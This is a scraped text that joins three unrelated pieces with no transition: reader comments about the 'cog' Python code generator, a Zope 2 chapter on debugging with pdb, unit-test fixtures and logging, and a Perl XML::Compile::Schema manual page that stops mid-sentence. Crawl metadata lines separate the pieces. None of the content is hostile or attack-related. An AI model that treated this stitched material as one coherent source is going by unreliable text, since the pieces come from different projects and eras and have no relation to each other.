Sorry for asking stupid question. Does this example still work? import cog cog.outl(" extern void simple1();") I am having trouble running this in Eclipse/Pydev. Thanks for your help. A useful feature would be to have an option that would allow the output of running cog to accumulate between ]]] and [[[end]]] rather than have it deleted. An example use case for this would be a file whose purpose is to accumulate data that is produced periodically, such as from a weather data generation service. This would be a great application for cog is there were someway to have it not deleted what was generated from previous runs. Further, it would be useful to specify that this behavior should per block rather than per file. This perhaps could be implemented as a meta-variable on the opening delimiter, say something line "p[[[cog{retain}", or something to that effect. What do you think? Hi Ned, A very useful tool. I would like to know whether, if I import one of my module in one file, then can I use the functions present in that module or any python variable defined in that cog file in other file ? Hi Ned, I'm using cog for automating some code generation from a text file, and I love it. It works great for removing some of the repetition from my day. Unfortunately, I've come across a bug. I read my input text file, and store my code lines in a dictionary of lists. When I come to a specific section I loop over each line in each list, in the appropriate dictionary entry, and print them with cog.outl(). All the lines start with \t to indent them appropriately, but cog strips this out, unless I also print a line with no indent. I have found a bug (Might not be after all). Currently with the latest COG available for download, I am unable to indent the code with '\t'(tab) in the beginning. I am using cog.out and cog.outl for creating the code statements. Currently I have changed the "reindentBlock" function in "whiteutils.py". Changed statement to "l = l.replace(oldIndent, '\t', 1)". Can you please check if it is a bug or am I missing something ? Your "Success Story" link was changed on you. It is now . @Jason: thanks, fixed! Great!, this is what I found. inline template is very interesting to maintain codes. Thanks for the useful tool! It would be helpful if you added an example for how to use -D parameters. It took me a while to realise that they are visible to the code in the template, but not to the imported code, i.e. I needed to pass in the globals as parameters to my generator code. Very useful tool... thanks! Using it for C++ code generation. Please consider changing line 637 in cogapp.py to (and importing glob) to allow for wildcards on Windows: for filename in glob.glob(args[0]): self.processOneFile(filename) Thanks for this tool! It would be usefull to automatically create directory when option -o is used. I use cog in my C++ project to encrypt data. And I've got a question.. Does cog work with unicode? The problem is that I try to get character code in unicode project. On my individual python project it works: # -*- coding: cp1251 -*- ... ... k = ord('а') #russian unicode symbol, k = 1072 But cog gaves me ASCII code [[[cog #-*- coding: cp1251 -*- import cog def test() : k = ord('а') cog.out('CString strChar = _T("') cog.out("".join("%d" % ord(k))) cog.out('")') ]]]*/ //[[[end]]] and it gaves me k = 224 # the same russian symbol but in ASCII I use the same interpretator in both cases (IronPython 2.7). Can you give me an advice? 2004–2012, Ned Batchelder
http://nedbatchelder.com/code/cog/index.html
CC-MAIN-2014-15
refinedweb
4,680
74.9
9. Testing and Debugging Attention This document was written for Zope 2. As you develop Zope applications you may run into problems. This chapter covers debugging and testing techniques that can help you. The Zope debugger allow you to peek inside a running process and find exactly what is going wrong. Unit testing allows you to automate the testing process to ensure that your code still works correctly as you change it. Finally, Zope provides logging facilities which allow you to emit warnings and error messages. 9.1. Debugging Zope provides debugging information through a number of sources. It also allows you a couple avenues for getting information about Zope as it runs. 9.1.1. Product Refresh Settings As of Zope 2.4 there is a Refresh view on all Control Panel Products. Refresh allows you to reload your product’s modules as you change them, rather than having to restart Zope to see your changes. The Refresh view provides the same debugging functionality previously provided by Shane Hathaway’s Refresh Product. To turn on product refresh capabilities place a ‘refresh.txt’ file in your product’s directory. Then visit the Refresh view of your product in the management interface. Here you can manually reload your product’s modules with the Refresh this product button. This allows you to immediately see the effect of your changes, without restarting Zope. You can also turn on automatic refreshing which causes Zope to frequently check for changes to your modules and refresh your product when it detects that your files have changed. Since automatic refresh causes Zope to run more slowly, it is a good idea to only turn it on for a few products at a time. 9.1.2. Debug Mode Normally, debug mode is set using the ‘-D’ switch when starting Zope. This mode reduces the performance of Zope a little bit. Debug model has a number of wide ranging effects: Tracebacks are shown on the browser when errors are raised. External Methods and DTMLFile objects are checked to see if they have been modified every time they are called. If modified, they are reloaded. Zope will not fork into the background in debug mode, instead, it will remain attached to the terminal that started it and the main logging information will be redirected to that terminal. By using debug mode and product refresh together you will have little reason to restart Zope while developing. 9.1.3. The Python Debugger Zope is integrated with the Python debugger (pdb). The Python debugger is pretty simple as command line debuggers go, and anyone familiar with other popular command line debuggers (like gdb) will feel right at home in pdb. For an introduction to pdb see the standard pdb documentation . There are a number of ways to debug a Zope process: - o You can shut down the Zope server and simulate a request on the - command line. o You can run a special ZEO client that debugs a running server. - o You can run Zope in debug model and enter the debugger - through Zope’s terminal session. The first method is an easy way to debug Zope if you are not running ZEO. First, you must first shut down the Zope process. It is not possible to debug Zope in this way and run it at the same time. Starting up the debugger this way will by default start Zope in single threaded mode. For most Zope developer’s purposes, the debugger is needed to debug some sort of application level programming error. A common scenario is when developing a new product for Zope. Products extend Zope’s functionality but they also present the same kind of debugging problems that are commonly found in any programming environment. It is useful to have an existing debugging infrastructure to help you jump immediately to your new object and debug it and play with it directly in pdb. The Zope debugger lets you do this. In reality, the “Zope” part of the Zope debugger is actually just a handy way to start up Zope with some pre-configured break points and to tell the Python debugger where in Zope you want to start debugging. 9.1.3.1. Simulating HTTP Requests Now for an example. Remember, for this example to work, you must shut down Zope. Go to your Zope’s ‘lib/python’ directory and fire up Python and import ‘Zope’ and ‘ZPublisher’: $ cd lib/python $ python Python 1.5.2 (#0, Apr 13 1999, 10:51:12) [MSC 32 bit (Intel)] on win32 Copyright 1991-1995 Stichting Mathematisch Centrum, Amsterdam >>> import Zope, ZPublisher >>> Here you have run the Python interpreter (which is where using the debugger takes place) and imported two modules, ‘Zope’ and ‘ZPublisher’. If Python complains about an ‘ImportError’ and not being able to find either module, then you are probably in the wrong directory, or you have not compiled Zope properly. If you get this message: ZODB.POSException.StorageSystemError: Could not lock the database file. There must be another process that has opened the file. This tells you that Zope is currently running. Shutdown Zope and try again. The ‘Zope’ module is the main Zope application module. When you import ‘Zope’ it sets up Zope. ‘ZPublisher’ is the Zope ORB. See Chapter 2 for more information about ‘ZPublisher’. You can use the ‘ZPublisher.Zope’ function to simulate an HTTP request. Pass the function a URL relative the your root Zope object. Here is an example of how to simulate an HTTP request from the debugger: >>> ZPublisher.Zope('') Status: 200 OK X-Powered-By: Zope (), Python () Content-Length: 1238 Content-Type: text/html <HTML><HEAD><TITLE>Zope</TITLE> ... blah blah... </BODY></HTML> >>> If you look closely, you will see that the content returned is exactly what is returned when you call your root level object through HTTP, including all the HTTP headers. Keep in mind that calling Zope this way does NOT involve a web server. No ports are opened. In fact, this is just an interpreter front end to the same application code the WSGI server does call. 9.1.3.2. Interactive Debugging Debugging involves publishing a request up to a point where you think it’s failing, and then inspecting the state of your variables and objects. The easy part is the actual inspection, the hard part is getting your program to stop at the right point. So, for the sake our example, let’s say that you have a ‘News’ object which is defined in a Zope Product called ‘ZopeNews’, and is located in the ‘lib/python/Products/ZopeNews’ directory. The class that defines the ‘News’ instance is also called ‘News’, and is defined in the ‘News.py’ module in your product. Therefore, from Zope’s perspective the fully qualified name of your class is ‘Products.ZopeNews.News.News’. All Zope objects have this kind of fully qualified name. For example, the ‘ZCatalog’ class can be found in ‘Products.ZCatalog.ZCatalog.ZCatalog’ (The redundancy is because the product, module, and class are all named ‘ZCatalog’). Now let’s create an example method to debug. You want your news object to have a ‘postnews’ method, that posts news: class News(...): ... def postnews(self, news, author="Anonymous"): self.news = news def quote(self): return '%s said, "%s"' % (self.author, self.news) You may notice that there’s something wrong with the ‘postnews’ method. The method assigns ‘news’ to an instance variable, but it does nothing with ‘author’. If the ‘quote’ method is called, it will raise an ‘AttributeError’ when it tries to look up the name ‘self.author’. Although this is a pretty obvious goof, we’ll use it to illustrate using the debugger to fix it. Running the debugger is done in a very similar way to how you called Zope through the python interpreter before, except that you introduce one new argument to the call to ‘Zope’: >>> ZPublisher.Zope('/News/postnews?new=blah', d=1) * Type "s<cr>c<cr>" to jump to beginning of real publishing process. * Then type c<cr> to jump to the beginning of the URL traversal algorithm. * Then type c<cr> to jump to published object call. > <string>(0)?() pdb> Here, you call Zope from the interpreter, just like before, but there are two differences. First, you call the ‘postnews’ method with an argument using the URL, ‘/News/postnews?new=blah’. Second, you provided a new argument to the Zope call, ‘d=1’. The ‘d’ argument, when true, causes Zope to fire up in the Python debugger, pdb. Notice how the Python prompt changed from ‘>>>’ to ‘pdb>’. This indicates that you are in the debugger. When you first fire up the debugger, Zope gives you a helpful message that tells you how to get to your object. To understand this message, it’s useful to know how you have set Zope up to be debugged. When Zope fires up in debugger mode, there are three breakpoints set for you automatically (if you don’t know what a breakpoint is, you need to read the python debugger documentation). The first breakpoint stops the program at the point that ZPublisher (the Zope ORB) tries to publish the application module (in this case, the application module is ‘Zope’). The second breakpoint stops the program right before ZPublisher tries to traverse down the provided URL path (in this case, ‘/News/postnews’). The third breakpoint will stop the program right before ZPublisher calls the object it finds that matches the URL path (in this case, the ‘News’ object). So, the little blurb that comes up and tells you some keys to press is telling you these things in a terse way. Hitting ‘s’ will step you into the debugger, and hitting ‘c’ will continue the execution of the program until it hits a breakpoint. Note however that none of these breakpoints will stop the program at ‘postnews’. To stop the debugger right there, you need to tell the debugger to set a new breakpoint. Why a new breakpoint? Because Zope will stop you before it traverse your objects path, it will stop you before it calls the object, but if you want to stop it exactly at some point in your code, then you have to be explicit. Sometimes the first three breakpoints are convienent, but often you need to set your own special break point to get you exactly where you want to go. Setting a breakpoint is easy (and see the next section for an even easier method). For example: pdb> import Products pdb> b Products.ZopeNews.News.News.postnews Breakpoint 5 at C:\Program Files\WebSite\lib\python\Products\ZopeNews\News.py:42 pdb> First, you import ‘Products’. Since your module is a Zope product, it can be found in the ‘Products’ package. Next, you set a new breakpoint with the break debugger command (pdb allows you to use single letter commands, but you could have also used the entire word ‘break’). The breakpoint you set is ‘Products.ZopeNews.News.News.postnews’. After setting this breakpoint, the debugger will respond that it found the method in question in a certain file, on a certain line (in this case, the fictitious line 42) and return you to the debugger. Now, you want to get to your ‘postnews’ method so you can start debugging it. But along the way, you must first continue through the various breakpoints that Zope has set for you. Although this may seem like a bit of a burden, it’s actually quite good to get a feel for how Zope works internally by getting down the rhythm that Zope uses to publish your object. In these next examples, my comments will begin with ‘#”. Obviously, you won’t see these comments when you are debugging. So let’s debug: pdb> s # 's'tep into the actual debugging > <string>(1)?() # this is pdb's response to being stepped into, ignore it pdb> c # now, let's 'c'ontinue onto the next breakpoint > C:\Program Files\WebSite\lib\python\ZPublisher\Publish.py(112)publish() -> def publish(request, module_name, after_list, debug=0, # pdb has stopped at the first breakpoint, which is the point where # ZPubisher tries to publish the application module. pdb> c # continuing onto the next breakpoint you get... > C:\Program Files\WebSite\lib\python\ZPublisher\Publish.py(101)call_object() -> def call_object(object, args, request): Here, ‘ZPublisher’ (which is now publishing the application) has found your object and is about to call it. Calling your object consists of applying the arguments supplied by ‘ZPublisher’ to the object. Here, you can see how ‘ZPublisher’ is passing three arguments into this process. The first argument is ‘object’ and is the actual object you want to call. This can be verified by printing the object: pdb> p object <News instance at 00AFE410> Now you can inspect your object (with the print command) and even play with it a bit. The next argument is ‘args’. This is a tuple of arguments that ‘ZPublisher’ will apply to your object call. The final argument is ‘request’. This is the request object and will eventually be transformed in to the DTML usable object ‘REQUEST’. Now continue, your breakpoint is next: pdb> c > C:\Program Files\WebSite\lib\python\Products\ZopeNews\News.py(42)postnews() -> def postnews(self, N) Now you are here, at your method. To be sure, tell the debugger to show you where you are in the code with the ‘l’ command. Now you can examine variable and perform all the debugging tasks that the Python debugger provides. From here, with a little knowledge of the Python debugger, you should be able to do any kind of debugging task that is needed. 9.1.3.3. Interactive Debugging Triggered From the Web If you are running in debug mode you can set break points in your code and then jump straight to the debugger when Zope comes across your break points. Here’s how to set a breakpoint: import pdb;pdb.set_trace() Now start Zope in debug mode and point your web browser at a URL that causes Zope to execute the method that includes a breakpoint. When this code is executed, the Python debugger will come up in the terminal where you started Zope. Also note that from your web browser it looks like Zope is frozen. Really it’s just waiting for you do your debugging. From the terminal you are inside the debugger as it is executing your request. Be aware that you are just debugging one thread in Zope, and other requests may be being served by other threads. If you go to the Debugging Info screen while in the debugger, you can see your debugging request and how long it has been open. It is often more convenient to use this method to enter the debugger than it is to call ‘ZPublisher.Zope’ as detailed in the last section. 9.1.3.4. Post-Mortem Debugging Often, you need to use the debugger to chase down obscure problems in your code, but sometimes, the problem is obvious, because an exception gets raised. For example, consider the following method on your ‘News’ class: def quote(self): return '%s said, "%s"' % (self.Author, self.news) Here, you can see that the method tries to substitute ‘self.Author’ in a string, but earlier we saw that this should really be ‘self.author’. If you tried to run this method from the command line, an exception would be raised: >>> ZPublisher.Zope('/News/quote') Traceback (most recent call last): File "<stdin>", line 1, in ? File "./News.py", line 4, in test test2() File "./News.py", line 3, in test2 return '%s said, "%s"' % (self.Author, self.news) NameError: Author >>> Using Zope’s normal debugging methods, you would typically need to start from the “beginning” and step your way down through the debugger to find this error (in this case, the error is pretty obvious, but more often than not errors can be pretty obscure!). Post-mortem debugging allows you to jump directly to the spot in your code that raised the exception, so you do not need to go through the possibly tedious task of stepping your way through a sea of Python code. In the case of our example, you can just pass ‘ZPublisher.Zope’ call a ‘pm’ argument that is set to 1: >>> ZPublisher.Zope('/News/quote', pm=1) Traceback (most recent call last): File "<stdin>", line 1, in ? File "./News.py", line 4, in test test2() File "./News.py", line 3, in test2 return '%s said, "%s"' % (self.Author, self.news) NameError: Author (pdb) Here, you can see that instead of taking you back to a python prompt, the post mortem debugging flag has caused you to go right into the debugging, exactly at the point in your code where the exception is raised. This can be verified with the debugger’s (l)ist command. Post mortem debugging offers you a handy way to jump right to the section of your code that is failing in some obvious way by raising an exception. 9.1.3.5. Debugging With ZEO ZEO presents some interesting debugging abilities. ZEO lets you debug one ZEO client when other clients continue to server requests for your site. In the above examples, you have to shut down Zope to run in the debugger, but with ZEO, you can debug a production site while other clients continue to serve requests. Using ZEO is beyond the scope of this chapter. However, once you have ZEO running, you can debug a client process exactly as you debug a single-process Zope. 9.2. Unit Testing Unit testing allows you to automatically test your classes to make sure they are working correctly. By using unit tests you can make sure as you develop and change your classes that you are not breaking them. Zope’s own unit tests are written using the built-in Python unittest module. 9.2.1. What Are Unit Tests A “unit” may be defined as a piece of code with a single intended purpose. A “unit test” is defined as a piece of code which exists to codify the intended behavior of a unit and to compare its intended behavior against its actual behavior. Unit tests are a way for developers and quality assurance engineers to quickly ascertain whether independent units of code are working as expected. Unit tests are generally written at the same time as the code they are intended to test. A unit testing framework allows a collection of unit tests to be run without human intervention, producing a minimum of output if all the tests in the collection are successful. It’s a good idea to have a sense of the limits of unit testing. From the Extreme Programming Enthusiast website here is a list of things that unit tests are not: Manually operated. Automated screen-driver tests that simulate user input (these are “functional tests”). Interactive. They run “no questions asked.” Coupled. They run without dependencies except those native to the thing being tested. Complicated. Unit test code is typically straightforward procedural code that simulates an event. 9.2.2. Writing Unit Tests Here are the times when you should write unit tests: When you write new code When you change and enhance existing code When you fix bugs It’s much better to write tests when you’re working on code than to wait until you’re all done and then write tests. You should write tests that exercise discrete “units” of functionality. In other words, write simple, specific tests that test one capability. A good place to start is with interfaces and classes. Classes and especially interfaces already define units of work which you may wish to test. Since you can’t possibly write tests for every single capability and special case, you should focus on testing the riskiest parts of your code. The riskiest parts are those that would be the most disastrous if they failed. You may also want to test particularly tricky or frequently changed things. Here’s an example test script that tests the ‘News’ class defined earlier in this chapter: import unittest import News class NewsTest(unittest.TestCase): def testPost(self): n=News() s='example news' n.postnews(s) assert n.news==s def testQuote(self): n=News() s='example news' n.postnews(s) assert n.quote()=='Anonymous said: "%s"' % s a='Author' n.postnews(s, a) assert n.quote()=='%s said: "%s"' % (a, s) def test_suite(): return unittest.makeSuite(NewsTest, 'news test') def main(): unittest.TextTestRunner().run(test_suite()) if __name__=="__main__": main() You should save tests inside a ‘tests’ sub-directory in your product’s directory. Test scripts file names should start with test, for example ‘testNews.py’. You may accumulate many test scripts in your product’s ‘tests’ directory. You can run test your product by running the test scripts. We cannot cover all there is to say about unit testing here. Take a look at the unittest module documentation for more background on unit testing. 9.2.3. Zope Test Fixtures One issue that you’ll run into when unit testing is that you may need to set up a Zope environment in order to test your products. You can solve this problem in two ways. First, you can structure your product so that much of it can be tested without Zope (as you did in the last section). Second, you can create a test fixture that sets up a Zope environment for testing. To create a test fixture for Zope you’ll need to: Add Zope’s ‘lib/python’ directory to the Python path. Import ‘Zope’ and any other needed Zope modules and packages. Get a Zope application object. Do your test using the application object. Clean up the test by aborting or committing the transaction and closing the Zope database connection. Here’s an example Zope test fixture that demonstrates how to do each of these steps: import os, os.path, sys, string try: import unittest except ImportError: fix_path() import unittest class MyTest(unittest.TestCase): def setUp(self): # Get the Zope application object and store it in an # instance variable for use by test methods import Zope self.app=Zope.app() def tearDown(self): # Abort the transaction and shut down the Zope database # connection. get_transaction().abort() self.app._p_jar.close() # At this point your test methods can perform tests using # self.app which refers to the Zope application object. ... def fix_path(): # Add Zope's lib/python directory to the Python path file=os.path.join(os.getcwd(), sys.argv[0]) dir=os.path.join('lib', 'python') i=string.find(file, dir) sys.path.insert(0, file[:i+len(dir)]) def test_suite(): return unittest.makeSuite(MyTest, 'my test') def main(): unittest.TextTestRunner().run(test_suite()) if __name__=="__main__": fix_path() main() This example shows a fairly complete Zope test fixture. If your Zope tests only needs to import Zope modules and packages you can skip getting a Zope application object and closing the database transaction. Some times you may run into trouble if your test assuming that there is a current Zope request. There are two ways to deal with this. One is to use the ‘makerequest’ utility module to create a fake request. For example: class MyTest(unittest.TestCase): ... def setup(self): import Zope from Testing import makerequest self.app=makerequest.makerequest(Zope.app()) This will create a Zope application object that is wrapped in a request. This will enable code that expects to acquire a ‘REQUEST’ attribute work correctly. Another solution to testing methods that expect a request is to use the ‘ZPublisher.Zope’ function described earlier. Using this approach you can simulate HTTP requests in your unit tests. For example: import ZPublisher class MyTest(unittest.TestCase): ... def testWebRequest(self): ZPublisher.Zope('/a/url/representing/a/method?with=a&couple=arguments', u='username:password', s=1, e={'some':'environment', 'variable':'settings'}) If the ‘s’ argument is passed to ‘ZPublisher.Zope’ then no output will be sent to ‘sys.stdout’. If you want to capture the output of the publishing request and compare it to an expected value you’ll need to do something like this: f=StringIO() temp=sys.stdout sys.stdout=f ZPublisher.Zope('/myobject/mymethod') sys.stdout=temp assert f.getvalue() == expected_output Here’s a final note on unit testing with a Zope test fixture: you may find Zope helpful. ZEO allows you to test an application while it continues to serve other users. It also speeds Zope start up time which can be a big relief if you start and stop Zope frequently while testing. Despite all the attention we’ve paid to Zope testing fixtures, you should probably concentrate on unit tests that don’t require a Zope test fixture. If you can’t test much without Zope there is a good chance that your product would benefit from some refactoring to make it simpler and less dependent on the Zope framework. 9.3. Logging Zope provides a framework for logging information to Zope’s application log. You can configure Zope to write the application log to a file, syslog, or other back-end. The logging API defined in the ‘zLOG’ module. This module provides the ‘LOG’ function which takes the following required arguments: subsystem – The subsystem generating the message (e.g. “ZODB”) severity – The “severity” of the event. This may be an integer or a floating point number. Logging back ends may consider the int() of this value to be significant. For example, a back-end may consider any severity whose integer value is WARNING to be a warning. summary – A short summary of the event These arguments to the ‘LOG’ function are optional: detail – A detailed description error – A three-element tuple consisting of an error type, value, and traceback. If provided, then a summary of the error is added to the detail. reraise – If provided with a true value, then the error given by error is reraised. You can use the ‘LOG’ function to send warning and errors to the Zope application log. Here’s an example of how to use the ‘LOG’ function to write debugging messages: from zLOG import LOG, DEBUG LOG('my app', DEBUG, 'a debugging message') You can use ‘LOG’ in much the same way as you would use print statements to log debugging information while Zope is running. You should remember that Zope can be configured to ignore log messages below certain levels of severity. If you are not seeing your logging messages, make sure that Zope is configured to write them to the application log. In general the debugger is a much more powerful way to locate problems than using the logger. However, for simple debugging tasks and for issuing warnings the logger works just fine. 9.4. Other Testing and Debugging Facilities There is a few other testing and debugging techniques and tools not commonly used to test Zope. In this section we’ll mention several of them. 9.4.1. Debug Logging Zope provides an analysis tool for debugging log output. This output allows may give you hints as to where your application may be performing poorly, or not responding at all. For example, since writing Zope products lets your write unrestricted Python code, it’s very possibly to get yourself in a situation where you “hang” a Zope request, possibly by getting into a infinite loop. To try and detect at which point your application hangs, use the requestprofiler.py script in the utilities directory of your Zope installation. To use this script, you must run Zope with the ‘-M’ command line option. This will turn on “detailed debug logging” that is necessary for the requestprofiler.py script to run. The requestprofiler.py script has quite a few options which you can learn about with the ‘–help’ switch. In general debug log analysis should be a last resort. Use it when Zope is hanging and normal debugging and profiling is not helping you solve your problem. 9.4.2. HTTP Benchmarking HTTP load testing is notoriously inaccurate. However, it is useful to have a sense of how many requests your server can support. Zope does not come with any HTTP load testing tools, but there are many available. Apache’s ‘ab’ program is a widely used free tool that can load your server with HTTP requests. 9.5. Summary Zope provides a number of different debugging and testing facilities. The debugger allows you to interactively test your applications. Unit tests allow help you make sure that your application is develops correctly. The logger allows you to do simple debugging and issue warnings.
https://zope.readthedocs.io/en/latest/zdgbook/TestingAndDebugging.html
CC-MAIN-2022-21
refinedweb
4,774
64.3
Hi all, I'm having trouble finding information for what I need. I think it's because I don't really know the nane of what I'm looking for, so keywords are eluding me in my search. I hope my explanation might give someone a clue who can help or at least tell me what to search. I want my application to use external third party dll files, from which it will gather information without having to modify my code. So as an example, I have in my code (which will be compiled as exe) code such as... namespace NSpace { interface IInterface1 { string name(); string url(); } class InternalUse : IInterface1 { public string name { get; set; } public string url { get; set; } string IInterface1.name() { string name = "site name"; return name; } string IInterface1.url() { string url = @""; return url; } } } I want end user to be able to create a class in a dll that implements IInterface1, in fact more than one dll and my exe will need to load and use its methods. So as it stands, my exe will run, and print the name and url returned by the methods in InternalUse class. My goal is that if my exe finds a dll in specific dir, it should load it, and print the name and url of whatever its ExternalUse class might return, there may be multiple dlls. So what am I actually talking about, and what is simplest way to go about it? I would prefer to use no later than .Net 4. Thanks for reading my noob ramblings. (edit) I can, if it makes it easier, enforce the class name that implements IInterface1 in external dll, but not the dll name. Edited by Suzie999
https://www.daniweb.com/programming/software-development/threads/503771/using-net-dlls
CC-MAIN-2018-43
refinedweb
284
78.08
jusText 2.2.0 Heuristic based boilerplate removal tool jusText is a fork of original (currently unmaintained) code of jusText hosted on Google Code. Below are some alternatives that I found: - - - - - - - - - - - - - Installation Make sure you have Python 2.6+/3.3+ and pip (Windows, Linux) installed. Run simply: $ [sudo] pip install justext Dependencies lxml>=2.2.4 Usage $ python -m justext -s Czech -o text.txt $ python -m justext -s English -o plain_text.txt english_page.html $ python -m justext --help # for more info Python API import requests import justext response = requests.get("") paragraphs = justext.justext(response.content, justext.get_stoplist("English")) for paragraph in paragraphs: if not paragraph.is_boilerplate: print paragraph.text Testing Run tests via $ py.test-2.6 && py.test-3.3 && py.test-2.7 && py.test-3.4 && py.test-3.5 Acknowledgements This software has been developed at the Natural Language Processing Centre of Masaryk University in Brno with a financial support from PRESEMT and Lexical Computing Ltd. It also relates to PhD research of Jan Pomikálek. Changelog for jusText 2.2.0 (2016-03-06) - INCOMPATIBLE CHANGE: Stop words are case insensitive. - INCOMPATIBLE CHANGE: Dropped support for Python 3.2 - BUG FIX: Preserve new lines from original text in paragraphs. 2.1.1 (2014-05-27) 2.1.0 (2014-01-25) 2.0.0 (2013-08-26) - FEATURE: Added pluggable DOM preprocessor. - FEATURE: Added support for Python 3.2+. - INCOMPATIBLE CHANGE: Paragraphs are instances of justext.paragraph.Paragraph. - INCOMPATIBLE CHANGE: Script ‘justext’ removed in favour of command python -m justext. - FEATURE: It’s possible to enter an URI as input document in CLI. - FEATURE: It is possible to pass unicode string directly. 1.2.0 (2011-08-08) - FEATURE: Character counts used instead of word counts where possible in order to make the algorithm work well in the language independent mode (without a stoplist) for languages where counting words is not easy (Japanese, Chinese, Thai, etc). - BUG FIX: More robust parsing of meta tags containing the information about used charset. - BUG FIX: Corrected decoding of HTML entities € to Ÿ 1.1.0 (2011-03-09) - First public release. - Author: Michal Belica - License: The BSD 2-Clause License - Categories - Development Status :: 5 - Production/Stable - Intended Audience :: Developers - License :: OSI Approved :: BSD License - Natural Language :: English - Operating System :: OS Independent - Programming Language :: Python - Programming Language :: Python :: 2 - Programming Language :: Python :: 2.6 - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3 - Programming Language :: Python :: 3.3 - Programming Language :: Python :: 3.4 - Programming Language :: Python :: 3.5 - Programming Language :: Python :: Implementation :: CPython - Topic :: Internet :: WWW/HTTP - Topic :: Software Development :: Pre-processors - Topic :: Text Processing :: Filters - Topic :: Text Processing :: Markup :: HTML - Package Index Owner: misobelica - DOAP record: jusText-2.2.0.xml
https://pypi.python.org/pypi/jusText
CC-MAIN-2017-13
refinedweb
454
52.05
INHERITANCE. (1); # to create the type nicely use XML::Compile::Util qw/pack_type/; my $type = pack_type 'myns', 'mytype'; print $type; # shows {myns}mytype # using a compiled routines cache use XML::Compile::Cache; # separate distribution my $schema = XML::Compile::Cache->new(...); # Show which data-structure is expected print $schema->template(PERL => $type); # Error handling tricks with Log::Report use Log::Report mode => 'DEBUG'; # enable debugging dispatcher SYSLOG => 'syslog'; # errors to syslog as well try { $reader->($data) }; # catch errors in [email protected] DESCRIPTIONThis. - "$schema->template('TREE', ...)" creates a parse tree - To be able to produce Perl-text and XML examples, the templater generates an abstract tree from the schema. That tree is returned here. Be warned that the structure is not fixed over releases: add regression tests for this to your project. Be warned that the schema is not validated; you can develop schemas which do work well with this module, but are not valid according to W3C. In many cases, however, the translater will refuse to accept mistakes: mainly because it cannot produce valid code. Extends ``DESCRIPTION'' in XML::Compile. METHODSExtends ``METHODS'' in XML::Compile. ConstructorsExtends ``Constructors'' in XML::Compile. - [] parser_options XML::Compile <many> schema_dirs XML::Compile undef typemap {} - block_namespace => NAMESPACE|TYPE|HASH|CODE|ARRAY - See blockNamespace() - hook => HOOK|ARRAY - See addHook(). Adds one HOOK (HASH) or more at once. - hooks => ARRAY - Add one or more hooks. See addHooks(). - ignore_unused_tags => BOOLEAN|REGEXP - (WRITER) Usually, a "mistake" warning - Translate XML element local-names into different Perl keys. See ``Key rewrite''. - parser_options => HASH|ARRAY - - schema_dirs => DIRECTORY|ARRAY-OF-DIRECTORIES - - typemap => HASH - HASH of Schema type to Perl object or Perl class. See ``Typemaps'', the serialization of objects. AccessorsExtends `" values are ignored. - $obj->addKeyRewrite($predef|CODE|HASH, ...) -. ($ns|$type|HASH|CODE|ARRAY) - Block all references to a $ns( [<'READER'|'WRITER'>] ) - Returns the LIST of defined hooks (as HASHes). [1.36] When an action parameter is provided, it will only return a list with hooks added with that action value or no action at all. - Schema my $wsdl = XML::Compile::WSDL->new($wsdl); my $geo = Geo::GML->new(version => '3.2.1'); # both $wsdl and $geo extend XML::Compile::Schema $wsdl->useSchema($geo); CompilersExtends ``Compilers'' in XML::Compile. - " format, there the url is the name-space. An alternative is the "url#id" which refers to an element or type with the specific "id" attribute {} xsi_type_everywhere <false> - abstract_types => 'ERROR'|'ACCEPT' -. - any_attribute => CODE|'TAKE_ALL'|'SKIP_ALL' - [0.89, reader] In general, "anyAttribute" schema, reader] In general, "any" schema. Supported values depends on the backend, specializations of XML::Compile::Translate. - attributes_qualified => "ALL"|"NONE"|BOOLEAN - [1.44] Like option "elements_qualified", but then for attributes. - block_namespace => NAMESPACE|TYPE|HASH|CODE|ARRAY - [reader]' - [reader]''. - elements_qualified => "TOP"|"ALL"|"NONE"|BOOLEAN - When defined, this will overrule the use of namespaces (as prefix) on elements in all schemas. When "ALL" or a true value is given, then all elements will be used qualified. When "NONE" "TOP" setting, the compiler checks that the targetNamespace exists. The "form" attributes in the schema will be respected; overrule the effects of this option. Use hooks when you need to fix name-space use in more subtile ways. With "element_form_default", you can correct whole schema's about their name-space behavior. Change in [1.44]: "TOP" before enforced a name-space on the top-level. There should always be a name-space on the top element. It got changed into that "TOP" checks that the globals have a targetNamespace. -" or "hooks" option - [writer] Overrules what is set with new(ignore_unused_tags). - include_namespaces => BOOLEAN|CODE - [writer] Indicates whether the namespace declaration should be included on the top-level element. -" as with some other compiled piece, but reset the counts to zero first. - output_namespaces => HASH|ARRAY-of-PAIRS - [Pre-0.87] name for the "prefixes" option. Deprecated. - path => STRING - Prepended to each error report, to indicate the location of the error in the XML-Scheme tree. - permit_href => BOOLEAN - [reader] When parsing SOAP-RPC encoded messages, the elements may have a "href" attribute" for external use. Each entry in the hash has as key the namespace uri. The value is a hash which contains "uri", "prefix", and "used" fields. - [reader] - [reader], writer] - See ``Handling xsi:type''. The HASH maps types as mentioned in the schema, to extensions of those types which are addressed via the horrible "xsi:type" construct. When you specify "AUTO" as value for some type, the translator tries collect possible xsi:type values from the loaded schemas. This may be slow and may produce imperfect results. - xsi_type_everywhere => BOOLEAN - [1.48, writer] Add an "xsi:type" attribute to all elements, for instance as used in SOAP RPC/encoded. The type added is the type according to the schema, unless the "xsi:type" is already present on an element for some other reason. Be aware that this option has a different purpose from "xsi_type". In this case, we do add exactly the type specified in the xsd to each element which does not have an "xsi:type" attribute yet. The "xsi_type" ) - Schema's can be horribly complex and unreadible. Therefore, this template method can be called to create an example which demonstrates how data of the specified $element shown as XML or Perl is organized in practice. The 'TREE' template returns the intermediate parse tree, which gets formatted into the XML or Perl example. This is not a very stable interface: it may change without much notice. Some %options are explained in XML::Compile::Translate. There are some extra %options defined for the final output process. The templates produced are not always correct. Please contribute improvements: read and understand the comments in the text. - - show_comments => STRING|'ALL'|'NONE' - A comma separated list of tokens, which explain what kind of comments need to be included in the output. The available tokens are: "struct", "type", "occur", "facets". A value of "ALL" will select all available comments. The "NONE" or empty string will exclude all comments. - skip_header => BOOLEAN - Skip the comment header from the output. AdministrationExtends ``Administration'' in XML::Compile. - ) - Inherited, DETAILSExtends ``DETAILS'' in XML::Compile. Distribution collection overviewExtends ``Distribution collection overview'' in XML::Compile. ComparisonExtends ``Comparison'' in XML::Compile. Collecting definitionsWhen explicitly(). Organizing your definitions); Addressing componentsNormally,". Representing data-structuresT. simpleType. complexType/simpleContent In this case, the single value container may have attributes. The number of attributes can be endless, and the value is only one. This value has no name, and therefore gets a predefined 